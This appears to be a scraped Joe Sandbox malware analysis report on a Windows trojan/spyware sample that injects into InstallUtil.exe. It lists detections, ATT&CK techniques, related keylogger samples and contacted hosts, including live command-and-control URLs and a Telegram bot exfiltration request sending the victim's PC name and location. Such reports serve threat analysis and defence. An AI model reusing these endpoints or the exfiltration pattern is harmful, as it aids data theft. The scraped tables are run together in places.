                    Access Token Manipulation                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Hidden Files and Directories                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    pbCN4g6sN5.exe71%ReversingLabsWin32.Trojan.Leonem
                    pbCN4g6sN5.exe100%AviraHEUR/AGEN.1306802
                    pbCN4g6sN5.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://varders.kozow.com:8081100%Avira URL Cloudmalware
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
                    http://anotherarmy.dns.army:8081100%Avira URL Cloudphishing
                    http://aborters.duckdns.org:8081100%Avira URL Cloudphishing

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		188.114.97.3
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		132.226.8.169
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              		high
                              http://checkip.dyndns.org/false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:36:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designersGpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/?pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/bThepbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.orgInstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/botpbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers?pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.tiro.compbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designerspbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallUtil.exe, 00000005.00000002.2907422568.000000000403C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000413E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.goodfont.co.krpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://chrome.google.com/webstore?hl=enInstallUtil.exe, 00000005.00000002.2903836633.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002F72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://chrome.google.com/webstore?hl=enlBiqInstallUtil.exe, 00000005.00000002.2903836633.0000000002F7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://varders.kozow.com:8081pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.sajatypeworks.compbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.typography.netDpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cn/cThepbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.galapagosdesign.com/staff/dennis.htmpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallInstallUtil.exe, 00000005.00000002.2907422568.0000000004042000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000411A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004017000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://checkip.dyndns.org/qpbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.galapagosdesign.com/DPleasepbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.fonts.compbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sandoll.co.krpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.urwpp.deDPleasepbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.zhongyicts.com.cnpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.sakkal.compbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.office.com/lBiqInstallUtil.exe, 00000005.00000002.2903836633.0000000002FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://reallyfreegeoip.org/xml/pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.office.com/InstallUtil.exe, 00000005.00000002.2903836633.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.fontbureau.compbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://checkip.dyndns.orgInstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016InstallUtil.exe, 00000005.00000002.2907422568.000000000403C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000413E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.ecosia.org/newtab/InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20aInstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.carterandcone.comlpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://aborters.duckdns.org:8081pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                      		unknown
                                                                                                                      https://ac.ecosia.org/autocomplete?q=InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.founder.com.cn/cnpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.fontbureau.com/designers/frere-user.htmlpbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anotherarmy.dns.army:8081pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                              		unknown
                                                                                                                              http://www.jiyu-kobo.co.jp/pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$InstallUtil.exe, 00000005.00000002.2903836633.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://reallyfreegeoip.orgInstallUtil.exe, 00000005.00000002.2903836633.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.fontbureau.com/designers8pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesInstallUtil.exe, 00000005.00000002.2907422568.0000000004042000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000411A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004017000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedpbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          132.226.8.169
                                                                                                                                          		checkip.dyndns.comUnited States
                                                                                                                                          		16989UTMEMUSfalse
                                                                                                                                          149.154.167.220
                                                                                                                                          		api.telegram.orgUnited Kingdom
                                                                                                                                          		62041TELEGRAMRUfalse
                                                                                                                                          188.114.97.3
                                                                                                                                          		reallyfreegeoip.orgEuropean Union
                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1586029
                                                                                                                                          Start date and time:2025-01-08 16:31:05 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 5m 48s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:7
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:pbCN4g6sN5.exe
                                                                                                                                          renamed because original name is a hash value
                                                                                                                                          Original Sample Name:0d6d13b615ce21e4a4ff75ec6ad0047a5664aafc05745188afc2e4497c2bed9f.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 97%
                                                                                                                                          • Number of executed functions: 158
                                                                                                                                          • Number of non-executed functions: 30
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 23.56.254.164, 4.175.87.197, 13.107.246.45
                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target InstallUtil.exe, PID 7492 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • VT rate limit hit for: pbCN4g6sN5.exe

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          10:32:03API Interceptor122789x Sleep call for process: pbCN4g6sN5.exe modified
                                                                                                                                          10:33:08API Interceptor2709x Sleep call for process: InstallUtil.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          132.226.8.169HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          149.154.167.220HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                            oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                    random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                      HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            Resource.exeGet hashmaliciousBlank GrabberBrowse

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              reallyfreegeoip.orgHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              api.telegram.orgHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              checkip.dyndns.comHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.247.73
